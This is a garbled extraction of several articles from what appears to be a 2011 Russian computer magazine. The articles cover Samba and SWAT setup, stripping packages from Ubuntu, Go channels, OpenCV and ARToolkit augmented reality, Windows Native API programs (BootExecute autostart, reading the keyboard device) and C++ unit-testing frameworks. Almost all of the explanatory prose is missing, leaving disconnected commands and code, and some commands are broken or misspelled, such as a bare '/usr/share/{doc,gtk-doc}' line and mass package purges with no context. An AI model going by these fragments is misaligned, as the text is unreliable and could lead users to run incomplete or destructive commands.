#!/bin/bash
for ((i=1; i<=100; i++)); do
dd if=/dev/zero of=testfile${i} count=1024 bs=1024
done
:
$ mount -t cifs -o guest //192.168.1.101/share \
/home/user/share/
:
$ time cp /home/user/share/testfile /home/user/
, ,
( Y ).
: Samba ,
. smb.conf ,
:
1. hide files
,
(
). /, ,
,
.
.
X 04 /147/ 2011
2. strict sync yes,

sync
,
, no .
3. sync always
, sync.
,

Samba .
4. wide links ,
.

.
5. deadtime
,
. 0,
.
,
15.
6. max connections .
0 ( ),

. 10 .
7. log level ,
0 10. ,

2,
.
DVD
dvd

DVD-
Samba
Webmin.
093
UNIXOID
Webmin -,
Samba
8. syslog syslog. 1,
. 0,
.
, -.
, Samba AIO_
SUPPORT, :
aio read size = 16384
aio write size = 16384
aio write behind = true
Shit happens
Samba .
, .

global:
dos charset = cp866
unix charset = UTF8
display charset = UTF8
CUPS,
.
Samba, global :
, 90-! SWAT smb.conf

,
, .
xinetd:
# pacman -S xinetd
/etc/xinetd.d/swat :
service swat
{
type = UNLISTED
protocol = tcp
port = 901
socket_type = stream
wait = no
user = root
server = /usr/sbin/swat
log_on_success += HOST DURATION
log_on_failure += HOST
disable = no
}
/etc/hosts.allow swat:127.0.0.1. xinetd:

# /etc/rc.d/xinetd start
load printers = no
show add printer wizard = no
printing = none
printcap name = /dev/null
disable spoolss = yes
WinXP , , ,
.
: 139/tcp 445/tcp. , 139- ,
getpeername failed. Error was Transport endpoint is not connected.
, global
smb ports = 139.
GUI
SWAT (Samba Web Administration Tool) .
094
! SWAT http://localhost:901.
Samba
Webmin,
.
# pacman -S webmin perl-net-ssleay
# /etc/rc.d/webmin start
-
https://localhost:10000.
Samba .

20%. , :
200%. z
X 04 /147/ 2011
UNIXOID
(zobnin@gmail.com)
Ubuntu
,
Ubuntu
2 ? ,
, .

Linux ,
, .
4 .
,
(
, -
).
?
, Linux
. Linux
, . ,
99% : ,
; , ,
;
X 04 /147/ 2011
;
; .
.
Linux . -
API,
win32 Windows Cocoa Mac OS X, Linux
. , GTK, Qt FLTK.
, ,
,
.
, ,

095
UNIXOID
(zobnin@gmail.com)
Gnome Ubuntu
. ,
Accessories. (gcalctool),
(gucharmap),
(baobab),
(gnome-search-tool) Tomboy. :
BleachBit:

Ubuntu
(
). ,
:
$ aptitude purge $(aptitude search ~ilinuximage -F %p|egrep -v "$(uname -r)|linux-imagegeneric")
. , ,
. ,
, ,
. , Ubuntu
Tomboy,
mono, 30 . Linux-
, ,
, ,
.
, , Ubuntu
-
.
, Ubuntu df -h. 1.9 .
. Games,
- .
:
$ sudo apt-get purge gnome-games-common gbrainy
gnome-games-common aisleriot, gnomemahjongg, gnome-sudoku, gnomine, quadrapassel

20 -
096
$ sudo apt-get purge gcalctool gucharmap \

baobab gnome-search-tool tomboy
10 mono. :
$ sudo apt-get purge mono-2.0-gac mono-charp-shell \
mono-gac mono-gmcs mono-runtime
30 .
. : pitivi. ,
- , apt-file,
:
$ sudo apt-get install apt-file
$ apt-file update
$ apt-file search /usr/bin/gnome-sound-recorder
gnome-media: /usr/bin/gnome-sound-recorder
(, ) gnome-media, :
$ sudo apt-get purge gnome-media
2.5 , . ,
VNC- Remote Desktop. ,
, :
$ sudo apt-get purge gnome-dictionary \
wamerican vinagre tsclient rdesktop
5 .
,
, ,
Ubuntu:
$ sudo apt-get purge gnome-accesibility-themes
gnome-doc-utils gnome-mag gnome-screensaver
screensaver-default-images xscreensaver-\*
gnome-user-guide example-content checkbox\*
branding-ubuntu
167 .
,
X 04 /147/ 2011
.
orphaner, deborphan:
$ sudo apt-get install deborpan
, , K.
,
.
, .
, ,
Ubuntu , , .
.
Ubuntu ,
. , , , web-
gmail, Ubuntu-
Rhytmbox (, ,
Amarok iTunes).
. -
IM- . .
, Ubuntu
OpenOffice. , , , ,
, , :
$ sudo apt-get purge openoffice\*
256 . .
: mail- Evolution,
Totem
Rhytmbox:
$ sudo apt-get purge evolution evolution-common
evolution-data-server evolution-indicator
evolution-plugins evolution-webcal libevolution
totem totem-common libtotem\* rhytmbox mediaplayer-info libgnome-media0
26 . -
gstreamer, Totem Rhytmbox,
. -, gstreamer
,

.
,

Brasero. ,
:
$ sudo apt-get purge gstreamer0.10-alsa
gstreamer0.10-nonlin gstreamer-0.10-nice
gstreamer0.10-plugins-base gstreamer0.10plugins-base-apps gstreamer0.10-plugins good
gstreamer0.10-pulseaudio gstreamer0.10-tools
gstreamer0.10-x gnome-codec-install brasero\*
Ubuntu Shotwell. X 04 /147/ 2011
orphaner
, , ,
Nautilus:
$ sudo apt-get purge shotwell
4 . , IM- Empathy
Gwibber. , ,
:
$ sudo apt-get purge empathy empathy-common
telepathy-\* gwibber gwibber-service
18 . BitTorrent-
transmission firefox,
Deluge
Google Chrome. System
Administration. , . ,

Computer Janitor. -
. , :
DVD
dvd

im_too_lazy_to_type_
it.txt.

copynpaste.
INFO
$ sudo apt-get purge computer-janitor\*
, :
info

-
$ sudo apt-get purge language-selector
,
language-elector-common
,
. - - .
, Ubuntu apt-get
,
, ,
, -
, .
.
, , Ubuntu - Bluetooth, -
, , . apt-get
, ,
3G Wi-Fi . , . Bluetooth : sudo apt-get
:
clean.
$ sudo apt-get purge bluez\*
097
UNIXOID
-
Bluetooth-,
bluez,
gnome- . : 12 .
, ? ,
. Ubuntu
Simple Scan, SANE.
, :
$ sudo apt-get purge libsane
15 . : ,
, , ,
Ubuntu, , :
$ sudo apt-get purge cups cups-common hpijs hplip-data
gsfonts
. Ubuntu
Xorg, . ,
, , , .
:
irrus,geode,i128,i740,intel,mach64,mga,neomagic,nouveau,
nv,openchrome,r128,radeon,rendition,s3,s3virge,savage,
siliconmotion,sis,sisusb,tdfx,trident,tseng,vmware,voodoo}
nVidia ATi:
$ sudo apt-get purge nvidia-\* fglrx-modaliases radeontool
, Ubuntu ,
,
, 90 :
$ sudo apt-get purge linux-headers-\*
,
,
, .
, . , compiz (,
, ):
$ sudo apt-get purge compiz\*
, ,
:
$ sudo apt-get purge espeak\* speach-dispatcher gnome-rca
$ cat /var/log/Xorg.log.0 | grep 'autoconfigured driver'
Matched ,
. ,
, .
apt-get. apt-get purge
xserver-xorg-video-, <Enter>
, , .
, ,
fbdev vesa:
$ sudo apt-get purge xserver-xorg-video-{apm,ati,chips,
098
, , (, ):
$ sudo apt-get purge gcc-4.4 gdb make
courchdb erlang,
Gnome, :
$ sudo apt-get purge erlang\* courchdb
smbclient,
X 04 /147/ 2011
Xorg-
, (
50 ):
:
$ sudo localepurge
$ sudo apt-get purge smbclient linsmbclinet
xulrunner, XUL:
$ sudo apt-get purge xulrunner-1.9.2
: dc, bc, ed,

ftp, lftp, pcmciutils, screen, rsync, strace, xterm, lsof, w3m, telnet,
tcpdump, vim\*.
: , , .
. orphaner,
:
$ sudo orphaner
:
$ df -h
1.4 , sudo du -sh / 1.3 . /var ( : du

-sh /var) 1.1 .
Gnome,
, , ,
. -
Firefox, Evince, Nautilus, Eye of Gnome
file-roller.
, 90 , :
$ sudo apt-get install localepurge
en en_GB ( Ubuntu), ru ru_RU ( ).

X 04 /147/ 2011
:
$ sudo /usr/share/{doc,gtk-doc}
, ,
Gnome -
.
: ,
gnome, , . Ubuntu ,
, , , Gnome, ,
kubuntu-desktop, KDE (
gnome, , apt-get ). Ubuntu Gnome
- : Ubuntu
Server ,
, , ,
gnome- .
, .
Ubuntu
Gnome, (
, ),
. , ,
apt-get purge.

. ,
, Ubuntu Gnome
500, , , . z
099
CODING
(zobnin@gmail.com)
Go
, -
.
.
Python .
Erlang
, .
Go ,

.
, , ,
, , Limbo.
, ,
, Go ,
Limbo.
Go 10 2009
. , UNIX,
UTF-8, Google,
, Go .
100
,
- -,
Go - .
- . .
Go ,
, ,
, . Go -
, Pascal ADA,

, , ,
X 04 /147/ 2011
INFO
info
Go
GCC
4.6

- .
, , , , Go
, .
Go :
1. .
2. , .
3. ,
.
?
.
Go -
,

, ,
C++. , ,
Go ,

.
,

, .
Go
, , , , , .

, ( C++
,
,
).
,
,
. ,
, .

. X 04 /147/ 2011

,
, .
,
,
.
Go , , ,
, .
,
( , , , ).
( ),
, , , ,
(
, Go, ).
, Go ,
,
. Go
Pascal, Modula Oberon:
. ,
,

, Go :
Go
gofmt,
.
Go
: i, j = j, i
HTTP://WWW
links
Go FAQ: golang.org/
doc/go_faq.html.

Go-:
golang.org/doc/
go_tutorial.html.

Go:
golang.org/doc/effective_go.html.
Go
: golang.org/
doc/go_mem.html.
int* a, b; // C++ "a"

, "b"
var a, b *int;
// Go
Go , . , , ,

, ( ,
).
, ,
101
CODING
Web- Go-
, , ,
( , , C++).

Go,
( Limbo,
Inferno). ,
, ,
, (CSP). ,
Occam Limbo, CSP,
. , ,
, , ,
, CSP
: ,

.
Go :
1. -.
2. , -
, ,
.
( ).
3. go.
4. .
,
,
. ,
? ?
, Go,
,
, . ,
,
, Go
.
102

1 package main
2
3 import "time"
4 import "fmt"
5
6 func timer(ch chan string, ns, count int) {
7 for j := 1; j <= count; j++ {
8
time.Sleep(int64(ns))
9
if j == count {
10
fmt.Printf("[timer]
...\n")
11
ch <- "!"
12
} else {
13
fmt.Printf("[timer] ...\n")
14
ch <- ""
15
}
16
fmt.Printf("[timer] !\n")
17 }
18 }
19
20 func main() {
21 var str string
22
23 ch := make(chan string)
24 go timer(ch, 1000000000, 10)
25
26 for {
27
fmt.Printf("[main] ...\n")
28
str = <-ch
29
if str == "!" {
30
fmt.Printf("[main] ,
.\n")
31
return
32
} else {
33
fmt.Printf("[main] !\n")
34
}
35 }
36 }

, ,
.
X 04 /147/ 2011
Go , Vim
Go. .
, , C++ Java,
Go ,
.
package,
, . main,
, . ,
, : ,
, ,
.
3 4 time fmt,
.

, C++, , Go,
-,
,
, -,
. !
6 timer()
.
, , , . ,
, ch
.
, , ,
. ns
count int. .
, Go ,
( :
- - ). Go ,
(, , ). ,
( Go ),
() X 04 /147/ 2011
.
, .

count , 7 for,
,
.
timer Sleep
( 8) time. ,
, int64 (
long ), ,
( , ).
, timer ,
, timer .
9 15
.
if, , , for,
. ,
..., !,
..., . Go , ch, chan string,
( Go
, ).
16
! .
, Go
main ( 20 36), . , main,
, timer,
.
, . str string,
var (
nil, NULL ).
make() ( 23),
.
make , new().
103
CODING
, .
ok false . , ok ==
false - ,
.
, :
ok := ch <-
2. Go , ,
. make:
, Go,

chan string , , ,
. ch, := (
,
).
24 timer - . -
go.
, timer , .
Go <-,
:
str = <-ch
,

, .
. 26 35.
Go while, , ,
for (
, ).
str , timer, ,
,
. ,
. ,
( python ruby) len (
).
,
(
UNIX, Plan9 MacOS X). (
Windows), ,
golang.org (, - timer ). .
,
?
, , -

, /
. , Go .
1. .
str = <-ch str, ok = <-ch,
104
ch := make(chan string, 10)

// 10
, , .
timer
,
.
3. ,
, , .
,
,
,
. ,
:
select {
case str = <-ch1:
//
case str = <-ch2:
//
case str = <-ch3:
//
}
select , . .
select ,
. ,
-
, default select.
select Go, ,
,
.
Inferno ( Go-
Limbo)
.
Go , ,
(

, Squeak,
NewSqueak Limbo). Go , .
, ,
,
. z
X 04 /147/ 2011
CODING
Fagot (salieff@mail.ru)
Augmented reality
,
. ,
.
, .

,
.
,
.
VHS-

.
. X 04 /147/ 2011
, ,
.
, web- GPS- XXI .

QR-,
.
AR Augmented
Reality.
105
CODING
AR-
AR
.
. , ,
,
(, ). , , AR.

, .
-

,
.
AR
,
.
.
. , , ,
, : , GPS .
, , .
, , , .
, Layar,
AR- .

, .
.
,
,
. ,
. ,
- - ,
106
How its made
AR-, , ,
. ,
. , , OpenCV (Open Source Computer Vision
Library
). .
RTL , , . -
,
;
,
;
, GUI .
BSD-. , OpenCV,
Windows, Linux, FreeBSD MacOS X.
OpenCV-
OpenCV. , ( )
.
.
, .
OpenCV
X 04 /147/ 2011
INFO
info
3D- AR-
Augmented Reality

: ,
OpenCV

.
DVD
AR
AR- Layar
cvCreateImage,
cvLoadImage,
cvCloneImage.
, ,
,
cvReleaseImage.
:
IplImage *img_orig = cvLoadImage("image.jpg");
,
,
.
, .
OpenCV . , .
cvNamedWindow("XaKeP OpenCV Window",
CV_WINDOW_AUTOSIZE);
cvShowImage("XaKeP OpenCV Window", img_orig);
cvWaitKey(0);
, .
, .
. - ,

. ,
(
, ) . , ,
, 50%,
, , .
8- , 0-127-255.

:
cvCvtColor(img_orig, img_gray, CV_RGB2GRAY);
cvEqualizeHist(img_gray, img_hist);
X 04 /147/ 2011
cvThreshold(img_hist, img_thr, 127, 255,

CV_THRESH_BINARY);
IplImage *img_thr_bkp = cvCloneImage(img_thr);
,
,
. , ,
.
, ,
, ,
(
), , , , .
, ,
.
CvMemStorage *storage = cvCreateMemStorage(0);
CvSeq *contours = NULL;
cvFindContours(img_thr, storage, &contours);
, .

( 2% ),
, . , ,
.
, :
dvd

,

OpenCV
ARToolkit.
HTTP://WWW
links

OpenCV:
http://goo.gl/Erg2f.

OpenCV:
http://goo.gl/Ls2JM.

ARToolkit: hitl.washington.edu/artoolkit.
Layar:
layar.com.
while (contours) {
CvSeq *result = cvApproxPoly(...
cvContourPerimeter(contours)*0.02 ...);
if (result->total==4 && cvContourArea(result)
>= 100 && cvCheckContourConvexity(result))
{
cvDrawContours(img_orig, result, ...);

() , . , ,
, .

107
CODING
OpenCV
, , 200200, srcQuad dstQuad :
CvMat *warp_mat = cvCreateMat(3, 3, CV_32FC1);
cvGetPerspectiveTransform(srcQuad, dstQuad, warp_mat);
IplImage* mrk = cvCreateImage(cvSize(200, 200), 8, 1);
cvWarpPerspective(img_thr_bkp, mrk, warp_mat);
,
. , , . . ,

.
,
. ,
.

. , -,
.
, , . ,
,
, .
.
OpenCV .
, , , .
,
. .
,
. , , (
).
,
:
CvHaarClassifierCascade *cascade=(CvHaarClassifierCascade*)
cvLoad("/usr/share/opencv/haarcascades/haarcascade_
frontalface_default.xml");
.
,
, ,
, .
108
,
,
:
CvSeq *faces = cvHaarDetectObjects(img_gray, cascade,
storage);
for (size_t i=0; i<faces->total; ++i) {
CvRect *r = (CvRect*)cvGetSeqElem(faces, i);
cvRectangle(img, cvPoint(r->x, r->y),
cvPoint(r->x + r->width, r->y + r->height));
}

, . , . , , OpenCV . ,
, .
ARToolkit
OpenCV, ,
.

. 1999
, - .
HIT
, ARToolkit.

. ,
.
.
OpenGL,
. ,
,
.
API,
,
,
.
, , ,
, Flash SilverLight.
X 04 /147/ 2011
URL
QR-
ARToolkit,
callback,
, ,
(
ESC), ,
:
ARToolkit
ARToolkit

, , ARToolkit.
Hiro, Kanji, Sample1 Sample2; pdf
patterns. Sample1
, Hiro
, ,
. OpenGL
GLUT, :
glutInit(&argc, argv);
ARToolkit. :
, ,
,
GUI, :
arVideoOpen("");
arVideoInqSize(&frame_width, &frame_height);
arParamLoad("Data/camera_para.dat", 1, &param1);
arParamChangeSize(&param1, frame_width,
frame_height, &param2);
arInitCparam(&param2); // Webcam
argInit(&param2, 1.0, 0, 0, 0, 0); // GUI
bin/Data ,
.
,
blankPatt.gif
mk_patt, .
mrk1_id = arLoadPatt("Data/patt.sample1");
mrk2_id = arLoadPatt("Data/patt.hiro");
X 04 /147/ 2011
argMainLoop(NULL, keyFunc, mainFunc);
mainFunc .
.
,
:
ARUint8 *frame = (ARUint8 *)arVideoGetImage();
argDispImage(frame, 0, 0);
arDetectMarker(frame, 100, &mrk_info, &mrk_count);
for (int i=0; i<mrk_count; ++i)
if (mrk1_id==mrk_info[i].id) index=i;
. OpenGL.
,
,
.
:
arGetTransMat(&mrk_info[index], mrk1_center,
rk1_width, mrk1_trans);
argConvGlpara(mrk1_trans, gl_para);
glMatrixMode(GL_MODELVIEW);
glLoadMatrixd(gl_para);
glutSolidCube(50.0);
, , , Augmented Reality, -. OpenCV ARToolkit ,

:). z
109
CODING
(hex.pp.ua)
Native API

,
Windows,
, .
Windows,
Win32, .

Windows XP , Windows 2003 ,

Vista Windows 7 . ,
,
.
chkdsk.exe. ,
, autochk.exe ,
Native API.
Win32.
, , ,
.
.
110
ZenWinX,
NCLI TinyKRNL
. ZenWinX
, ,
, ,
, NCLI, . , NCLI
Shift. , NCLI,
, . ,
Native Shell.
, ,
native-, ,
X 04 /147/ 2011
DVD
dvd

Native Shell 0.12
Native Shell Windows XP

WDK

native- HKEY_LOCAL_MACHINE\CurrentControlSet\Control\Session Manager.
,
. ,
BootExecute. ,
autocheck autochk *.
. , native.exe %systemroot%\system32, BootExecute native.
native.exe autochk.exe
. ,
native some-command.
,
NT-,
(, C:\tmp\native.exe).
native- autocheck
( autochk )
async debug. debug
ProcessParameters -> DebugFlags = TRUE.
async ,
, ,
. ,
,
SYSTEM.
, ,
SetupExecute BootExecute.
,
.
SetupExecute
, BootExecute
.
NT Native API, ntdll.dll.

, ,
.
, : Zw Nt. Zw
(, ),
Nt ( ). Nt
, Zw,

,
.
, Native-
, ,
. , X 04 /147/ 2011
WWW
. ,
, : undocumented.
ntinternals.net.
MSDN. ntdll.dll
Microsoft Developers Network Windows Driver Kit: msdn.
microsoft.com.
Native Shell. native- :
hex.pp.ua/nt-native-applications-shell.php.
ReactOS Windows.

Native API ,
: svn.reactos.org/svn/reactos.
ZenWinX, native: zenwinx.sourceforge.net.
Native Development Kit (NDK) .
, Native API:
code.google.com/p/native-nt-toolkit.
,
, .
Native API ,
API . WinAPI - - ,
Native API, , -. ,
WinAPI ntdll.dll.
native- , Native API.

NT Native API MSDN.
, ntdll,
.
,
native- build
Windows Driver Kit, .
WDK , native-.
WDK ,
,
SOURCES. native:
TARGETNAME=native
TARGETTYPE=PROGRAM
UMTYPE=nt
INCLUDES=$(DDK_INC_PATH)
SOURCES=native.c
PRECOMPILED_INCLUDE=precomp.h
111
CODING
Windows XP
,
, native-. TARGETTYPE
PROGRAM, , UMTYPE nt , ,
native.
build,
Build Environment WDK.
NDK (Native NT Toolkit), WDK ,
Native API. ndk
, WDK,
bin/setenv.bat ( include=).
.exe- .
, .
PE- exe- , , . native-
0x01, , .exe
.
, Windows GUI (0x02)
Windows console (0x03). -
Native-
Windows. Windows Win32.

BootExecute.
, -, , -, . BootExecute
,
Windows.
, ,
.
,
, ,
,
. ,
-
.

NtCreateFile .
\Device\KeyboardClass0.
HANDLE hDriver;
UNICODE_STRING Driver;
112
Windows
OBJECT_ATTRIBUTES ObjectAttributes;
IO_STATUS_BLOCK Iosb;
RtlInitUnicodeString(&Driver, L"\\Device\\KeyboardClass0");
InitializeObjectAttributes(&ObjectAttributes, &Driver,
OBJ_CASE_INSENSITIVE, NULL, NULL);
NtCreateFile(&hDriver, SYNCHRONIZE | GENERIC_READ |
FILE_READ_ATTRIBUTES,
&ObjectAttributes, &Iosb, NULL, FILE_ATTRIBUTE_NORMAL,
0, FILE_OPEN, FILE_DIRECTORY_FILE, NULL, 0);
( Event),
.
InitializeObjectAttributes(&ObjectAttributes,
NULL, 0, NULL, NULL);
NtCreateEvent(&hEvent, EVENT_ALL_ACCESS,
&ObjectAttributes, 1, 0);
NtReadFile,
.
IO_STATUS_BLOCK Iosb;
LARGE_INTEGER ByteOffset = 0;
NTSTATUS Status;
RtlZeroMemory(&Iosb, sizeof(Iosb));
Status = NtReadFile(hDriver, hEvent, NULL, NULL, &Iosb,
Buffer, *BufferSize, &ByteOffset, NULL);

NtWaitForSingleObject.
if (Status == STATUS_PENDING)
{
Status = NtWaitForSingleObject(hEvent, TRUE, NULL);
}
NtReadFile KEYBOARD_INPUT_DATA.
:
typedef struct _KEYBOARD_INPUT_DATA {
USHORT UnitId;
USHORT MakeCode;
USHORT Flags;
USHORT Reserved;
ULONG ExtraInformation;
} KEYBOARD_INPUT_DATA, *PKEYBOARD_INPUT_DATA;
X 04 /147/ 2011
native-
BootExecute
MakeCode , Flags
,
Shift, Ctrl - . ,
,
.
getch. , . ,
,
, Windows
. Native-
NtTerminateProcess(NtCurrentProcess(), 0);
, UNICODE_STRING -
NtDisplayString:
UNICODE_STRING unic;
RtlInitUnicodeString(&unic, L"Hello, world!\n");
NtDisplayString(&unic);

\r \n.
,
. native-
.
, ,
, . , ,
.

:
NTSYSAPI ULONG NTAPI RtlGetCurrentDirectory_U(
ULONG MaximumLength,
PWSTR Buffer
);
NTSYSAPI NTSTATUS NTAPI RtlSetCurrentDirectory_U(
X 04 /147/ 2011

SYSTEM
IN PUNICODE_STRING name
);
NT- .
\??\. ,
C:\boot.ini \??\C:\boot.ini.
Native API
DOS-. DOS NT
:
NTSYSAPI BOOLEAN NTAPI RtlDosPathNameToNtPathName_U(
IN PCWSTR DosPathName,
OUT PUNICODE_STRING NtPathName,
OUT PCWSTR *NtFileNamePart,
OUT CURDIR *DirectoryInfo
);
DOS-.
, .
NT
.

. ,
. ,
NtCreateFile FILE_LIST_DIRECTORY
FILE_DIRECTORY_FILE. NtQueryDirectoryFile,
FileBothDirectoryInformation FILE_
BOTH_DIR_INFORMATION.
: , ,
.
typedef struct _FILE_BOTH_DIR_INFORMATION
{
113
CODING
.
FileInformation FILE_RENAME_INFORMATION.
typedef struct _FILE_RENAME_INFORMATION
{
BOOLEAN ReplaceIfExists;
HANDLE RootDirectory;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;
Native- Windows, ReactOS

ULONG NextEntryOffset;
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
ULONG EaSize;
CCHAR ShortNameLength;
WCHAR ShortName[12];
WCHAR FileName[1];
} FILE_BOTH_DIR_INFORMATION,
*PFILE_BOTH_DIR_INFORMATION;
NtQueryDirectoryFile
ReturnSingleEntry = TRUE,
FILE_BOTH_DIR_
INFORMATION, ,
. FALSE
,
. , , NextEntryOffset.
NULL.
,
, , MSDN.
NtReadFile, NtWriteFile, NtDeleteFile ,
WinAPI.
,
.
, .
NtSetInformationFile, .
. :
NTSYSCALLAPI NTSTATUS NTAPI NtSetInformationFile(
IN HANDLE FileHandle,
IN PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass
);
FileInformationClass
FileRenameInformation, -
114
FILE_RENAME_INFORMATION , .
. ,
NewFileName FileNameSize.
PFILE_RENAME_INFORMATION FileRenameInfo;
FileRenameInfo = RtlAllocateHeap(RtlGetProcessHeap(),
HEAP_ZERO_MEMORY,
sizeof(FILE_RENAME_INFORMATION) + FileNameSize);
NewFileName
FileName .
ReplaceIfExists , ,
. RootDirectory
, .
NULL,
FileName
NT-.
, , FileName
.
:
Status = NtSetInformationFile(
FileHandle,
&IoStatusBlock,
FileRenameInfo,
sizeof(FILE_RENAME_INFORMATION)+ FileNameSize,
FileRenameInformation
);
FileRenameInfo sizeof(FILE_
RENAME_INFORMATION),
FileName.
Length , FileName.
MSDN
, -Key, ,
NtQueryValueKey.
Native API , Win32.
HKEY_XXX
\REGISTRY \USER \
MACHINE. HKEY_USERS HKEY_
LOCAL_MACHINE. HKEY_CURRENT_USER ,
\USER. HKEY_
CLASSES_ROOT , \USER, \MACHINE.
WinAPI , ,
HANDLE, HKEY.
2006
NtRegEdit
X 04 /147/ 2011
KeyValueBasicInformation, KEY_
VALUE_BASIC_INFORMATION.
pbi = (PKEY_VALUE_BASIC_INFORMATION)buf;
while (STATUS_SUCCESS == NtEnumerateValueKey(hKey, i++,
KeyValueBasicInformation, pbi, BUFFER_SIZE, &ResultLength))
{
;
}
pbi->Name, (REG_SZ, REG_

DWORD ) pbi->Type.
TinyKRNL
(regedit.exe). NtRegEdit
Native API,
native-.
ZenWinX , . , winx_register_boot_exec_command
, , , ,
BootExecute.
ntreg rodream

ntreg.c ntreg.h,
. , , ,
.
, - ,
NtEnumerateKey.
NTSYSCALLAPI NTSTATUS NTAPI NtEnumerateKey(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_INFORMATION_CLASS KeyInformationClass,
OUT PVOID KeyInformation,
IN ULONG Length,
OUT PULONG ResultLength
);
KEY_
NODE_INFORMATION. KeyInformationClass
KeyNodeInformation, KeyInformation
.
:
ULONG ResultLength, i = 0;
char buf[BUFFER_SIZE];
PKEY_NODE_INFORMATION pki = (PKEY_NODE_INFORMATION)buf;
while (STATUS_SUCCESS == NtEnumerateKey(hKey, i++,
KeyNodeInformation, pki, BUFFER_SIZE, &ResultLength))
{
;
}

WCHAR pki->Name,
- . , ,
NtEnumerateValueKey
X 04 /147/ 2011
.
,
,
, .
native-
. native-, , .
Win32-, Win32
CSRSS (
). Windows
, ,
autochk.exe, autofmt.exe ( Win32- chkdsk.exe
format.exe ), srdelayed.exe
( ).
native- , RtlCreateUserProcess.
RTL_USER_PROCESS_
PARAMETERS,
RtlCreateProcessParameters.
NT-, .

RTL_USER_PROCESS_INFORMATION. NtResumeThread,
.
.

, , .
, .
. ,
ProcessHandle RTL_USER_PROCESS_INFORMATION
NtWaitForSingleObject,
.

autochk.exe , .
RtlCreateUserProcess :
: autochk.exe
: autochk.exe /p \??\C:
: \??\C:\windows\system32\autochk.exe
Native-
.
native-

. ,
Native API,
. z
115
CODING
deeonis (deeonis@gmail.com)
Unit
C++
. , , .
,
. , , .
-?
. ,
-
,
.
, ,
.
, ,
80% ,
.
, unit- ,
, . , . . ,
. - ,
. ,
, unit-test
, . ,

.
unit-
. , . , , ( ,
- ,
).
,
, ,
.
- . , /,
. ,
. .
116

. , , . , ,
, ,
, .
, - , SVN.

.
. , , , ,
. ,
.
unit-.
, . C++, -.
CppUnit
, unit-test C++.
JUnit
Java. , CppUnit
, ,
.
. TestCase,
.
TestCase, runTest(),
.
CppUnit::TestCase
class ComplexNumberTest : public CppUnit::TestCase
{
public:
ComplexNumberTest( std::string name ) :
CppUnit::TestCase( name )
{
}
void runTest()
{
CPPUNIT_ASSERT( Complex (10, 1) == Complex (10, 1) );
X 04 /147/ 2011
CppUnit
Google C++ Testing Framework:

code.google.com/p/googletest;
CppUnit: sourceforge.net/apps/
mediawiki/cppunit/index.php.
Google C++ Testing Framework

void setUp()
{
m_10_1 = new Complex( 10, 1 );
m_1_1 = new Complex( 1, 1 );
m_11_2 = new Complex( 11, 2 );
}
CPPUNIT_ASSERT( !(Complex (1, 1) == Complex (2, 2)) );

}
};
,
, TestFixture TestCaller.
TestFixture ,
. - setUp(). ,
(, ), tearDown(), .
. ,
.
CppUnit::TestFixture
class Complex
{
friend bool operator ==(const Complex& a, const Complex& b);
double real, imaginary;
public:
Complex( double r, double i = 0 )
: real(r),
imaginary(i)
{
}
};
bool operator ==( const Complex &a, const Complex &b )
{
return a.real == b.real && a.imaginary == b.imaginary;
}
class ComplexNumberTest :
public CppUnit::TestFixture
{
private:
Complex *m_10_1, *m_1_1, *m_11_2;
public:
X 04 /147/ 2011
void tearDown()
{
delete m_10_1;
delete m_1_1;
delete m_11_2;
}
};
,
TestCaller. , , TestFixture. TestCaller ,
, , . :
CppUnit::TestCaller
public CppUnit::TestFixture
{
...
public:
...
void testEquality()
{
CPPUNIT_ASSERT( *m_10_1 == *m_10_1 );
CPPUNIT_ASSERT( !(*m_10_1 == *m_11_2) );
}
void testAddition()
{
CPPUNIT_ASSERT( *m_10_1 + *m_1_1 == *m_11_2 );
}
};
CppUnit::TestCaller<ComplexNumberTest> test(
"testEquality", &ComplexNumberTest::testEquality
);
CppUnit::TestResult result;
test.run( &result );
117
CODING
Wikipedia
, , CppUnit Test
Case. Test Case . -,
, , -,
TestCaller . -
Suite CppUnit::TestSuite.
addTest,
TestCaller.
CppUnit::TestSuite *suiteOfTests =
new CppUnit::TestSuite( "ComplexNumberTest" );
suiteOfTests->addTest(
new CppUnit::TestCaller<ComplexNumberTest>(
"testEquality",
&ComplexNumberTest::testEquality ) );
suiteOfTests->addTest(
new CppUnit::TestCaller<ComplexNumberTest>(
"testAddition",
&ComplexNumberTest::testAddition ) );
CppUnit::TestSuite
CppUnit::TestSuite suite;
CppUnit::TestResult result;
suite.addTest( new CppUnit::TestCaller<ComplexNumberTest>(
"testEquality",
&ComplexNumberTest::testEquality ) );
suite.addTest( new CppUnit::TestCaller<ComplexNumberTest>(
"testAddition",
&ComplexNumberTest::testAddition ) );
suite.run( &result );
, (Test Suite)
TestRunner. addTest
. , suite, TestSuite.
CppUnit::TestRunner
public CppUnit::TestFixture {
...
public:
static CppUnit::Test *suite()
{
118
return suiteOfTests;
}
...
};
int main( int argc, char **argv)
{
CppUnit::TextUi::TestRunner runner;
runner.addTest( ExampleTestCase::suite() );
runner.addTest( ComplexNumberTest::suite() );
runner.run();
return 0;
}
.
,
. ,
, .
Google C++ Testing Framework

Google C++ Testing Framework.
X 04 /147/ 2011
BSD- 2008 ,
.
Google Test ( )
xUnit, CppUnit. ,
, ,

, .
CppUnit, .
, ASSERT_TRUE EXPECT_GE. .
ASSERT_xxx , ( ) EXPECT_xxx
, .

TEST. ,
. , ,
. :
TEST()
int Factorial(int n); // n
// 0.
TEST(FactorialTest, HandlesZeroInput)
{
EXPECT_EQ(1, Factorial(0));
}
// .
TEST(FactorialTest, HandlesPositiveInput)
{
}
Google Test fixture, .

::testing::Test, SetUp
TearDown . , TestFixture CppUnit.
::testing::Test
template <typename E> // E
class Queue
{
public:
Queue();
void Enqueue(const E& element);
q1_.Enqueue(1);
q2_.Enqueue(2);
q2_.Enqueue(3);
}
// virtual void TearDown() {}
Queue<int> q0_;
Queue<int> q1_;
Queue<int> q2_;
};
, , TEST_F(). , TEST_F, , TEST(),

.
TEST TEST_F,
.
TEST_F()
TEST_F(QueueTest, IsEmptyInitially)
{
EXPECT_EQ(0, q0_.size());
}
